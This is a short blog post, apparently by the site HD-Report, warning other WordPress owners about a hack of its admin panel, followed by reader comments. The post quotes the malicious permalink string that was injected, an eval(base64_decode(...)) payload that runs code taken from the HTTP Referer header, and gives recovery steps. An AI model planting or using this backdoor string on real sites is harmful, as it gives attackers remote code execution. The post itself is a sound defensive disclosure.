For the past several hours HD-Report was not working correctly due to a hack upon our site. A malicious URL string was placed at the end of each of our pages, which caused problems in linking to the pages as well as error messages.
HD-Report proudly runs on WordPress, however due the popularity of the open source platform it is frequently a target of hackers. We thought we would post this message to help out and warn other sites who may be vulnerable.
Brief overview:
Somehow a hacker was able to access the administration tools. A custom structure string coded as “/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/” was placed at the end of each permalink.
To fix you should first change your password. Then, delete suspected users who may be using the login “admin” or other name that looks suspicious. Third, go to the Permalinks options and reset to your preferred settings. You may notice the “Custom Structure” has the malicious string.
To avoid this from happening to your WordPress site, update to the latest version 2.8, be careful of new users, and backup your files frequently!
Here are a couple links to the WordPress forum which go into the issue in more detail:
http://wordpress.org/support/topic/307588
http://wordpress.org/support/topic/307518
I thought that was an over-hyped at the time, until many sites starting getting hacked. In the last couple of weeks it has been happening a lot.
We were also hacked. Check your uploads directory–you’ll most likely find a series of new folders there, probably buried in year and month folders, containing websites selling pharmaceuticals and warez.
Sucks man. You should report them to Interpol.